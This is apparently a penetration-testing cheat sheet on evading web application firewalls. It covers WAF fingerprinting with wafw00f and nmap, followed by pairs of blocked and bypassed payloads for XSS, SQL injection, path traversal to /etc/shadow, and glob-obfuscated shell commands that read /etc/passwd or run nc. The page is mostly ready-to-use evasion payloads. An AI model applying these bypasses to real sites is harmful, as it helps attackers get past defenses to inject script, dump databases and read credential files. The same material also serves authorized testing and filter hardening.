WAF Bypass
Last updated
Was this helpful?
Last updated
Was this helpful?
A WAF or web application firewall helps protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet.
It typically protects web applications from attacks such as cross-site forgery, cross-site-scripting (XSS), file inclusion, and SQL injection, among others.
A WAF is a protocol layer 7 defense (in the OSI model), and is not designed to defend against all types of attacks. This method of attack mitigation is usually part of a suite of tools which together create a holistic defense against a range of attack vectors.
WAFs use standard ports : 80, 443, 8000, 8008, 8080, and 8088.
wafw00f $target# detecting the waf
nmap -p$port --script http-waf-detect $target
# fingerprinting the waf
nmap -p$port --script http-waf-fingerprint $targetCombine upper and lower case characters for creating great payloads.
# bypassed
<ScrIpT>confirm()</sCRiPt>
sELeCt * fRoM * wHerE OWNER = 'NAME_OF_DB'
# url example
http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4Encode normal payloads with % encoding/URL encoding.
You can use Burp. It has an encoder/decoder tool.
# blocked by waf
<Svg/x=">"/OnLoAD=confirm()//
# bypassed
%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F
# blocked by waf
UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)
# bypassed
UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29
# url example
https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECTASCII characters in Unicode encoding give us great variants for bypassing WAF.
Encode entire or part of the payload for obtaining results.
# basic request
<marquee onstart=prompt()>
# obfuscated
<marquee onstart=\u0070r\u06f\u006dpt()>
# blocked by waf
/?redir=http://google.com
# bypassed
/?redir=http://googleγcom (Unicode alternative)
# blocked by waf
<marquee loop=1 onfinish=alert()>x
# bypassed
οΌmarquee loopοΌ1 onfinishοΌalertοΈ΅1)>x (Unicode alternative)
# basic request
../../etc/shadow
# obfuscated
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadowWebApps encode special characters into HTML. Encoding and render them accordingly.
Basic bypass cases with HTML encoding numeric and generic.
# basic request
"><img src=x onerror=confirm()>
# encoded payload
"><img src=x onerror=confirm()>
# or
"><img src=x onerror=confirm()> Such rules often tend to filter out a specific type of encoding.
Such filters can be bypassed by mixed encoding payloads.
Newlines and tabs and further add to obfuscation.
# obfuscated payload
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>Comments obfuscate standard payload vectors.
Different payloads have different ways of obfuscation.
# blocked by waf
<script>confirm()</script>
# bypassed
<!--><script>confirm/**/()/**/</script>
# blocked by waf
/?id=1+union+select+1,2--
# bypassed
/?id=1+un/**/ion+sel/**/ect+1,2--
# url example
index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#
index.php?page_id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3Web Application Firewall filters tend to encode characters to protect web app.
Poorly developed filters (without recursion filters) can be bypassed with double encoding.
# basic request
http://example/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
# obfuscated payload
http://example/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\
# basic payload
<script>confirm()</script>
# obfuscated payload
%253Cscript%253Econfirm()%253C%252Fscript%253EGlobal patterns are used by various command-line utilities to work with multiple files.
We can change them to run system commands.
# basic request
/bin/cat /etc/passwd
# obfuscated payload
/???/??t /???/??ss??
# used chars
/ ? t s
# basic request
/bin/nc 127.0.0.1 443
# obfuscated payload
/???/n? 2130706433 443
# used chars
/ ? n [0-9]Simple payloads get filtered out easily by WAF.
Adding some junk chars helps avoid detection (only specific cases ).
This technique often helps in confusing regex-based firewalls.
# basic request
<script>confirm()</script>
# obfuscated payload
<script>+-+-1-+-+confirm()</script>
# basic request
<BODY onload=confirm()>
# obfuscated payload
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>
# basic request
<a href=javascript;alert()>ClickMe
# bypassed technique
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
